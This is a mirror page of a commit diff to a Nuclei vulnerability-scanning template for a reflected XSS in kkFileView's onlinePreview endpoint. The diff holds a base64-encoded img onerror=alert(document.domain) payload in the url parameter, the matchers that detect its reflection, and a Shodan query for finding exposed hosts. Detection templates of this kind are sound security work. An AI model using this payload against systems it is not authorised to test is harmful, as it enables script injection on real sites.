daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2022-40879.yaml

patch-1
Ritik Chaddha 2022-10-26 11:34:41 +05:30 committed by GitHub
parent d127329d7e
commit cb9ce38ac9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
cves/2022/CVE-2022-40879.yaml
View File

@ -15,20 +15,23 @@ info:
cve-id: CVE-2022-29349
cwe-id: CWE-79
metadata:
shodan-query: http.html:"kkFileView"
verified: true
shodan-query: http.html:"kkFileView"
tags: cve,cve2022,kkFileView,xss
requests:
- method: GET
path:
- "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydCgxKT49PQ=="
- "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=1 onerror=alert(1)>'
- '<img src=1 onerror=alert(document.domain)>=PQ</p>'
- '该文件不'
condition: and
- type: word
part: header